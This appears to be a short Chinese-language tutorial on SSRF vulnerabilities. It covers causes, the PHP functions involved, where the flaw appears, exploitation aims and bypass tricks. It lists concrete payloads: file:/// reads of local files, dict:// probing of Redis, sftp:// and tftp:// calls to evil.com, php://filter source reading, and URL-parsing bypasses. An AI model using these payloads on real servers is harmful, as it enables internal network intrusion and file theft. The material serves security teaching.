SSRF漏洞

SSRF漏洞

        SSRF漏洞（服务器端请求伪造）：是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。（正是因为它是由服务端发起的，所以它能够请求到与它相连而与外网隔离的内部系统）。

1、SSRF原理

        SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。

PHP中下面函数的使用不当会导致SSRF:

file_get_contents()

fsockopen()

curl_exec()

2、SSRF漏洞利用手段

       1.可以对外网、内网、本地进行端口扫描，某些情况下端口的Banner会回显出来（比如3306的）；

　　2.攻击运行在内网或本地的有漏洞程序（比如溢出）；

　　3.可以对内网Web应用进行指纹识别，原理是通过请求默认的文件得到特定的指纹；

　　4.攻击内网或外网有漏洞的Web应用；

　　5.使用file：///协议读取本地文件(或其他协议）

　　http://www.xingkonglangzi.com/ssrf.php?url=192.168.1.10:3306

　　http://www.xingkonglangzi.com/ssrf.php?url=file:///c:/windows/win.ini

3、SSRF漏洞出现点

　　1.分享：通过URL地址分享网页内容　　　　　　　　　　　　　　　　　　　　　　　　　

　　2.转码服务（通过URL地址把原地址的网页内容调优，使其适合手机屏幕的浏览）

　　3.在线翻译

　　4.图片加载与下载：通过URL地址加载或下载图片

　　5.图片、文章收藏功能

　　6.未公开的api实现及调用URL的功能

       7.从URL关键字中寻找

4、SSRF伪协议利用方式

file:/// 从文件系统中获取文件
?url=file:///var/www/html/flag.php

dict:// 可以用来端口扫描，操作Redis。
?url=dict://127.0.0.1:8000

sftp:// SSH安全文件传输协议
?url=sftp://evil.com:1337/ 

ldap:// 轻量级目录访问协议。它是IP网络上的一种用于管理和访问分布式目录信息服务的应用程序协议。
?url=ldapi://localhost:1337/%0astats%0aquit

tftp:// 文件传输协议
?url=tftp://evil.com:1337/TESTUDPPACKET 

gopher:// 分布式文档传递服务，反弹shell。
php://filter/read=convert.base64-encode/resource=ssrf.php 读取php文件源码

5、绕过方式

1.利用?绕过限制url=https://www.baidu.com?www.xxxx.me

2.利用@绕过限制url=https://[email protected]

3.利用斜杠反斜杠绕过限制

4.利用#绕过限制url=https://www.baidu.com#www.xxxx.me

5.利用子域名绕过

6.利用畸形url绕过

7.利用跳转ip绕过

SSRF-pikachu

1-curl

 

2-file_get_content